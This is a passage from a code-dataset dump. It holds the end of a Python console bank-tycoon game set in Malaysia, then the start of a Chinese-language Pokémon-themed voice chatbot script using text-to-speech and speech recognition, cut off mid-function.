Failed Investment\r\n if chanceOfSuccess == 2:\r\n money = money - bankInvestment\r\n print(\"The business you invested in failed!\")\r\n print(\"You did not make any money back!\")\r\n print(\"You wasted: \" + Fore.RED + \"RM\" + str(bankInvestment) + Fore.RESET)\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(4)\r\n GetToWork()\r\n\r\n if yn == \"n\":\r\n replit.clear()\r\n print(\"You refused to invest in the business!\")\r\n print(\"Maybe you would've made more money.\")\r\n time.sleep(3)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # Check donation bin\r\n if choice == \"5\":\r\n amount = random.randint(10, 15)\r\n donation = amount * staff_upgrade + TimeToWork\r\n print(\"You look into the recycle bin\")\r\n print(\"There is a total of: \" + Fore.GREEN + \"RM\" + str(donation) + Fore.RESET)\r\n money = money + donation\r\n print(\"Your Balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Sabotage Competition\r\n if choice == \"6\":\r\n print(\"You leave the bank to try and sabotage other bank's advertisements!\")\r\n time.sleep(2)\r\n print(\"You were able to take down some of their posters!\")\r\n print(\"Some customers may not like this though!\")\r\n time.sleep(2)\r\n customersLost = random.randint(1, 50)\r\n customersGained = random.randint(1, 50)\r\n replit.clear()\r\n print(Fore.RED + \"You lost: \" + str(customersLost) + \" customers\" + Fore.RESET)\r\n print(Fore.GREEN + \"But you also gained: \" + str(customersGained) + \" customers\" + Fore.RESET)\r\n customers = customers - customersLost\r\n customers = customers + customersGained\r\n\r\n if customersGained > customersLost:\r\n difference = customersGained - customersLost\r\n print(Fore.GREEN + \"You now have made \" + str(difference) + \" new customers!\")\r\n time.sleep(2)\r\n\r\n if customersLost > customersGained:\r\n difference = customersLost - customersGained\r\n print(\"You were unable to make any new customers!\")\r\n print(Fore.RED + \"You were able to get: \" + str(difference) + \" customers!\" + Fore.RESET)\r\n time.sleep(2)\r\n\r\n print(\"Current Customers: \" + str(customers))\r\n time.sleep(5)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # Leave work\r\n if choice == \"7\":\r\n replit.clear()\r\n print(\"Exiting work and going home...\")\r\n time.sleep(3)\r\n Menu()\r\n\r\n\r\n################################### MAIN MENU ##################################\r\n\r\ndef Menu():\r\n replit.clear()\r\n global money, customers, gear_upgrade, staff_upgrade, security_upgrade, paperwork_price, current_location, gear_upgrade_price, security_upgrade_price, staff_upgrade_price\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER!\", \"red\", attrs=[\"bold\", \"underline\"])\r\n print(Fore.GREEN + \"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\r\n\r\nYou won, but also lost. Better luck next time.\"\"\" + Fore.RESET)\r\n return\r\n\r\n if customers <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n print(\"Your bank ran out of customers :(\")\r\n\r\n if money >= 100000:\r\n cprint(\"YOU WON! You got your bank to RM100,000\", \"green\", attrs=[\"bold\"])\r\n print(\"But however, there is a recession... so bye\")\r\n time.sleep(4)\r\n for i in range(1, money):\r\n time.sleep(0.3)\r\n money = money - 1000\r\n cprint(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n replit.clear()\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER\", \"red\")\r\n print(Fore.GREEN + \"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\"\"\" + Fore.RESET)\r\n return\r\n\r\n print(\"Current Balance: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Current Customers = \" + str(customers))\r\n print(\"Current Location: \" + current_location)\r\n print(\"\")\r\n print(\"Here is the main menu! What do you want to do?\")\r\n print(\"1. Upgrade Your Equipment (\" + Fore.GREEN + \"RM\" + str(gear_upgrade_price) + Fore.RESET + \") \" + str(\r\n gear_upgrade) + \"/5\")\r\n print(\"2. Upgrade Your Security (\" + Fore.GREEN + \"RM\" + str(security_upgrade_price) + Fore.RESET + \") \" + str(\r\n security_upgrade) + \"/5\")\r\n print(\"3. Upgrade Your Staff (\" + Fore.GREEN + \"RM\" + str(staff_upgrade_price) + Fore.RESET + \") \" + str(\r\n staff_upgrade) + \"/5\")\r\n print(\"4. Advertise (\" + Fore.GREEN + \"RM\" + str(advertise_price) + Fore.RESET + \")\")\r\n print(\"5. Move location\")\r\n print(\"6. Go To Work\")\r\n\r\n choice = input(\">> \")\r\n\r\n ################################################################################################################\r\n\r\n # Equipment Upgrade\r\n if choice == \"1\":\r\n if money < gear_upgrade_price:\r\n print(\"You do not have enough for this upgrade!\")\r\n time.sleep(3)\r\n replit.clear()\r\n Menu()\r\n\r\n if gear_upgrade == 5:\r\n print(\"You can no longer upgrade this!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to upgrade your Equipment for: \" + Fore.GREEN + \"RM\" + str(\r\n gear_upgrade_price) + Fore.RESET)\r\n\r\n yn = input(\"y/n: \")\r\n if yn == \"y\":\r\n money = money - gear_upgrade_price\r\n gear_upgrade = gear_upgrade + 1\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(gear_upgrade_price) + Fore.RESET)\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Your Equipment Level is now: \" + str(gear_upgrade))\r\n gear_upgrade_price = gear_upgrade_price + 500\r\n time.sleep(3)\r\n replit.clear()\r\n Menu()\r\n if yn == \"n\":\r\n replit.clear()\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Security Upgrade\r\n if choice == \"2\":\r\n if money < security_upgrade_price:\r\n print(\"You do not have enough money for this upgrade!\")\r\n time.sleep(3)\r\n replit.clear\r\n Menu()\r\n\r\n if security_upgrade == 5:\r\n print(\"You can no longer upgrade this!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to upgrade your Security for: \" + Fore.GREEN + \"RM\" + str(\r\n security_upgrade_price) + Fore.RESET)\r\n\r\n yn = input(\"y/n: \")\r\n if yn == \"y\":\r\n money = money - security_upgrade_price\r\n security_upgrade = security_upgrade + 1\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(security_upgrade_price) + Fore.RESET)\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Your Security Level is now: \" + str(security_upgrade))\r\n security_upgrade_price = security_upgrade_price + 500\r\n time.sleep(3)\r\n replit.clear()\r\n Menu()\r\n\r\n if yn == \"n\":\r\n replit.clear()\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Staff Upgrade\r\n if choice == \"3\":\r\n if money < staff_upgrade_price:\r\n print(\"You do not have enough money for this upgrade!\")\r\n time.sleep(3)\r\n replit.clear()\r\n Menu()\r\n\r\n if staff_upgrade == 5:\r\n print(\"You can no longer upgrade this!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to upgrade your Staff for: \" + Fore.GREEN + \"RM\" + str(\r\n staff_upgrade_price) + Fore.RESET)\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n money = money - staff_upgrade_price\r\n staff_upgrade = staff_upgrade + 1\r\n print(\"Taken away: \" + Fore.RED + \"RuntimeWarning\" + str(staff_upgrade_price) + Fore.RESET)\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Your Staff level is now: \" + str(staff_upgrade))\r\n staff_upgrade_price = staff_upgrade_price + 250\r\n time.sleep(3)\r\n replit.clear()\r\n Menu()\r\n\r\n if yn == \"n\":\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Advertise!\r\n if choice == \"4\":\r\n\r\n if money < advertise_price:\r\n print(\"You do not have enough money for this!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Robberies\r\n chanceOfRobbery = random.randint(1, 100)\r\n if security_upgrade == 1:\r\n if chanceOfRobbery < 50:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 2:\r\n if chanceOfRobbery < 40:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 3:\r\n if chanceOfRobbery < 30:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 4:\r\n if chanceOfRobbery < 20:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 5:\r\n if chanceOfRobbery < 10:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n money = money - advertise_price\r\n replit.clear()\r\n print(\"You paid: \" + Fore.RED + \"RM\" + str(advertise_price) + Fore.RESET)\r\n print(\"Printing Posters...\")\r\n time.sleep(2)\r\n print(\"Uploading Website Adverts...\")\r\n time.sleep(1)\r\n print(\"Created Billboard\")\r\n print(\"\")\r\n new_customers = random.randint(10, 30)\r\n customers = customers + new_customers\r\n\r\n print(\"Well done! You have achieved\", new_customers, \"new customers!\")\r\n NC_Money = new_customers * 5\r\n money = money + NC_Money\r\n print(\"You earned \" + Fore.GREEN + \"RM\" + str(NC_Money) + Fore.RESET + \" from new customers signing up!\")\r\n time.sleep(3)\r\n replit.clear()\r\n Menu()\r\n\r\n ###################### MOVING BANK LOCATIONS ###################################\r\n\r\n if choice == \"5\":\r\n replit.clear()\r\n print(\r\n \"You have decided to move your bank location to bigger cities for more money! But where do you choose? And what can you afford?\")\r\n print(\"1. Penang (\" + Fore.GREEN + \"RM\" + str(Penang_price) + Fore.RESET + \")\")\r\n print(\"2. Johor (\" + Fore.GREEN + \"RM\" + str(Johor_price) + Fore.RESET + \")\")\r\n print(\"3. Pahang (\" + Fore.GREEN + \"RM\" + str(Pahang_price) + Fore.RESET + \")\")\r\n print(\"4. Kedah (\" + Fore.GREEN + \"RM\" + str(Kedah_price) + Fore.RESET + \")\")\r\n print(\"5. Perlis (\" + Fore.GREEN + \"RM\" + str(Perlis_price) + Fore.RESET + \")\")\r\n print(\"6. Negeri Sembilan(\" + Fore.GREEN + \"RM\" + str(NegeriSembilan_price) + Fore.RESET + \")\")\r\n print(\"7. Kelantan (\" + Fore.GREEN + \"RM\" + str(Kelantan_price) + Fore.RESET + \")\")\r\n print(\"8. Go back to the Main Menu\")\r\n new_location = input(\">> \")\r\n\r\n ################################################################################################################\r\n\r\n # Penang\r\n if new_location == \"1\":\r\n if money < Penang_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Penang\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Penang\"\r\n money = money - Penang_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Penang_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +100\")\r\n customers = customers + 100\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Johor\r\n if new_location == \"2\":\r\n if money < Johor_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Johor\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Johor\"\r\n money = money - Johor_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Johor_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +150\")\r\n customers = customers + 150\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Pahang\r\n if new_location == \"3\":\r\n if money < Pahang_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Pahang \":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Pahang \"\r\n money = money - Pahang_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Pahang_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +200\")\r\n customers = customers + 200\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Kedah\r\n if new_location == \"4\":\r\n if money < Kedah_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Kedah\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Kedah\"\r\n money = money - Kedah_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Kedah_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +250\")\r\n customers = customers + 250\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Perlis\r\n if new_location == \"5\":\r\n if money < Perlis_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Perlis\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Perlis\"\r\n money = money - Perlis_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Perlis_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +300\")\r\n customers = customers + 300\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Negeri Sembilan\r\n if new_location == \"6\":\r\n if money < NegeriSembilan_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Negeri Sembilan\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Negeri Sembilan\"\r\n money = money - NegeriSembilan_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(NegeriSembilan_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +350\")\r\n customers = customers + 350\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Kelantan\r\n if new_location == \"7\":\r\n if money < Kelantan_price:\r\n print(\"You do not have enough money to move here\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if current_location == \"Kelantan\":\r\n print(\"You already are here!\")\r\n time.sleep(1)\r\n Menu()\r\n\r\n print(\"Are you sure you would like to move to this location?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n print(\"Alright then! You have moved to a new location!\")\r\n current_location = \"Kelantan\"\r\n money = money - Kelantan_price\r\n print(\"Taken away: \" + Fore.RED + \"RM\" + str(Kelantan_price) + Fore.RESET)\r\n print(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Customers Gained: +400\")\r\n customers = customers + 400\r\n time.sleep(4)\r\n Menu()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then! Back to the Main Menu!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n if new_location == \"8\":\r\n print(\"Going back to the main menu\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Going to work\r\n if choice == \"6\":\r\n print(\"Driving to work...\")\r\n time.sleep(2)\r\n GetToWork()\r\n\r\n\r\nMenu()\r\n\r\n################################################################################################################","sub_path":"bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":36499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"145017559","text":"from gtts import gTTS\nfrom pygame import mixer\nimport tempfile\nimport speech_recognition\nimport time \n\n\n\n\n\nresume = open('resume.txt',encoding='cp950')\nresumedata = resume.read()\n\n\n\na = [\"火龍火龍\",\"\",\"火龍火龍火龍很煩的說\"]\n\n\n#listenfile = 0\n#def chat_map_character_pika\n#def chat_map_character_jney\n#def chat_map_character_seed\n\n\n\ndef function_listen():\n read = speech_recognition.Recognizer()\n\n with speech_recognition.Microphone() as source:\n read.adjust_for_ambient_noise(source)\n audio_data1 = read.listen(source)\n \n return read.recognize_google(audio_data1, language='zh-TW')\n#function_listen()\n#print(function_listen())\n\n\n\n\ndef recognize(word, a): \n if (\"皮卡\" in word):\n a[0] = \"皮卡皮卡\"\n a[2] = \"皮卡皮卡皮卡很煩的說\"\n elif (\"種子\" in word):\n a[0] = \"種子種子\"\n a[2] = \"種子種子種子很煩的說\" \n elif (\"傑尼\" in word):\n a[0] = \"傑尼傑尼\"\n a[2] = \"傑尼傑尼傑尼很煩的說\"\n a[1] = word\n return a\n\ndef function_speak(speaking):\n with tempfile.NamedTemporaryFile(delete=True) as f:\n mixer.init()\n words = gTTS(text=str(recognize(speaking,a)), lang=\"zh\")\n# words.save(\"f.name.mp3\")\n# mixer.music.load(\"f.name.mp3\") \n words.save(\"{0}.mp3\".format(f.name))\n mixer.music.load(\"{0}.mp3\".format(f.name))\n mixer.music.play()\n\n\n\n\n#################### \n\ndef chat_map_speak(response_words, time_sleep, chat_map_response):\n time.sleep(1)\n print(response_words)\n function_speak(response_words)\n time.sleep(time_sleep)\n listenfile = function_listen()\n print(\"您剛剛說:『\",listenfile,\"』嗎,讓我想一下怎麼回答\")\n function_speak(\"您剛剛說:\"+listenfile+\"嗎,讓我想一下怎麼回答\")\n time.sleep(10)\n chat_map_response(listenfile)\n\n\n\n\ndef chat_map_speak_re(last_voice, time_sleep, chat_map_response):\n time.sleep(1)\n print(\"我想很久說還是不懂說,不好意思您剛剛說的話是:『\",last_voice,\"』齁?,抱歉聽得不是很清楚請可以麻煩大大再說一次ㄇ\")\n function_speak(\"我想很久說還是不懂說,不好意思您剛剛說的話是:\"+last_voice+\"齁?,抱歉聽得不是很清楚可以麻煩大大再說一次ㄇ\")\n time.sleep(time_sleep)\n listenfile = function_listen()\n print(\"您剛剛說:『\",listenfile,\"』嗎,讓我想一下怎麼回答\")\n function_speak(\"您剛剛說:\"+listenfile+\"嗎,讓我想一下怎麼回答\")\n time.sleep(10)\n chat_map_response(listenfile) \n\n\n \n\ndef chat_map_speak_init():\n time.sleep(1)\n chat_map_init =\"你好 太陽公公說你好 你好你好你好我ㄇ開始洗頻你囉 我是域設總機小火龍 請問有什麼事情嗎\"\n print(chat_map_init)\n function_speak(chat_map_init)\n time.sleep(15)\n listenfile = function_listen()\n print(\"你說的話是:『\",listenfile,\"』對齁\")\n function_speak(\"你說的話是:\"+listenfile+\"對齁\")\n time.sleep(10)\n chat_map_response_0(listenfile)\n\n\n\n\n#================================\n\n\n\ndef chat_map_response_0(voice):\n if (\"喵\" in voice):\n chat_map_speak(\"安安你好我是喵號對話,請你根據每個情境環節喵喵看看,喵就會喵喵窩\", 10, chat_map_response_0)\n elif (\"皮卡\" in voice): \n chat_map_speak(\"維您好我是皮卡丘 不好意思我剛剛不在 現在才回到位置上 請問您找我有什麼事情嗎\", 12, chat_map_response_0) \n elif (\"種子\" in voice):\n chat_map_speak(\"維您好我是妙蛙種子 不好意思我剛剛不在 現在才回到位置上 請問您找我有什麼事情嗎\", 12, chat_map_response_0) \n elif (\"傑尼\" in voice):\n chat_map_speak(\"維您好我是傑尼龜 不好意思我剛剛不在 現在才回到位置上 請問您找我有什麼事情嗎\", 12, chat_map_response_0) \n elif (\"1\" in voice):\n chat_map_speak(\"安安你好我是1號對話地圖,請你根據1號設定的情境環節說話看看,我就會回答窩\", 10, chat_map_response_1)\n elif (\"2\" in voice):\n chat_map_speak(\"安安你好我是2號對話地圖,請你根據2號設定的情境環節說話看看,我就會回答窩\", 10, chat_map_response_2)\n elif (\"3\" in voice):\n chat_map_speak(\"安安你好我是3號對話地圖,請你根據3號設定的情境環節說話看看,我就會回答窩\", 10, chat_map_response_3)\n elif (\"你好嗎\" in voice):\n chat_map_speak(\"安安你好我是4號對話地圖,我是對應當你說你好嗎時候的4號隱藏版答案隱藏版隱藏版隱藏版窩 你剛剛縮的你好嗎很標準我聽懂樂ㄛ\", 15, chat_map_response_0) \n elif (\"12345\" in voice): \n chat_map_speak(\"安安你好我是5號對話地圖,1234566666666 你剛剛縮的12345很666我聽懂樂ㄛ,抱歉5號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0)\n elif (\"6\" in voice): \n chat_map_speak(\"安安你好我是6號對話地圖,請你根據6號設定的情境環節說話看看,我就會回答窩,抱歉6號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0) \n elif (\"787878\" in voice):\n chat_map_speak(\"安安你好我是7號對話地圖,787878的三號三三三三答案嘻嘻 嘻嘻 嘻嘻嘻嘻嘻嘻,你剛剛縮的78很標準我聽懂樂ㄛ,抱歉7號環節以及以下的分支主人還沒設定窩\", 20, chat_map_response_0) \n elif (\"878787\" in voice):\n chat_map_speak(\"安安你好我是8號對話地圖,878787 = 8號答案誇獎我誇獎我誇獎我誇獎我誇獎我,你剛剛縮的87很標準我聽懂樂ㄛ,抱歉8號環節以及以下的分支主人還沒設定窩\", 20, chat_map_response_0) \n elif (\"9\" in voice):\n chat_map_speak(\"安安你好我是9號對話地圖,請你根據9號設定的情境環節說話看看,我就會回答窩,抱歉9號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0) \n elif (\"0\" in voice):\n chat_map_speak(\"安安你好我是0號對話地圖,請你根據0號設定的情境環節說話看看,我就會回答窩,抱歉0號環節以及以下的分支主人還沒設定窩\", 15, chat_map_response_0) \n elif (\"自我介紹\" in voice):\n chat_map_speak(resume, 150, chat_map_response_0) \n elif (\"唱國歌\" in voice):\n chat_map_speak(\"張雅茹宇宙最聰明可愛善良天才美麗了 茹茹宇宙最棒最可愛了\", 10, chat_map_response_0) \n else: \n chat_map_speak_re(voice, 18, chat_map_response_0)\n\n\ndef chat_map_response_1(voice):\n if (\"11\" in voice):\n chat_map_speak(\"安安你好我是1-1號對話,請你根據1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1_1)\n elif (\"12\" in voice):\n chat_map_speak(\"安安你好我是1-2號對話,請你根據1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"13\" in voice):\n chat_map_speak(\"安安你好我是1-3號對話,請你根據1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_0(voice)\n\n\ndef chat_map_response_2(voice):\n if (\"21\" in voice):\n chat_map_speak(\"安安你好我是2-1號對話,請你根據2-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2_1)\n elif (\"22\" in voice):\n chat_map_speak(\"安安你好我是2-2號對話,請你根據2-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"23\" in voice):\n chat_map_speak(\"安安你好我是2-3號對話,請你根據2-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_0(voice)\n\ndef chat_map_response_3(voice):\n if (\"31\" in voice):\n chat_map_speak(\"安安你好我是3-1號對話,請你根據3-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1)\n elif (\"32\" in voice):\n chat_map_speak(\"安安你好我是3-2號對話,請你根據3-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"33\" in voice):\n chat_map_speak(\"安安你好我是3-3號對話,請你根據3-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_0(voice)\n\ndef chat_map_response_1_1(voice):\n if (\"111\" in voice):\n chat_map_speak(\"安安你好我是1-1-1號對話,請你根據1-1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1_1_1)\n elif (\"112\" in voice):\n chat_map_speak(\"安安你好我是1-1-2號對話,請你根據1-1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"113\" in voice):\n chat_map_speak(\"安安你好我是1-1-3號對話,請你根據1-1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_1(voice)\n\ndef chat_map_response_2_1(voice):\n if (\"211\" in voice):\n chat_map_speak(\"安安你好我是2-1-1號對話,請你根據2-1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_1)\n elif (\"212\" in voice):\n chat_map_speak(\"安安你好我是2-1-2號對話,請你根據2-1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_2)\n elif (\"213\" in voice):\n chat_map_speak(\"安安你好我是2-1-3號對話,請你根據2-1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_3)\n else:\n chat_map_response_2(voice)\n\n\n\n\ndef chat_map_response_1_1_1(voice):\n if 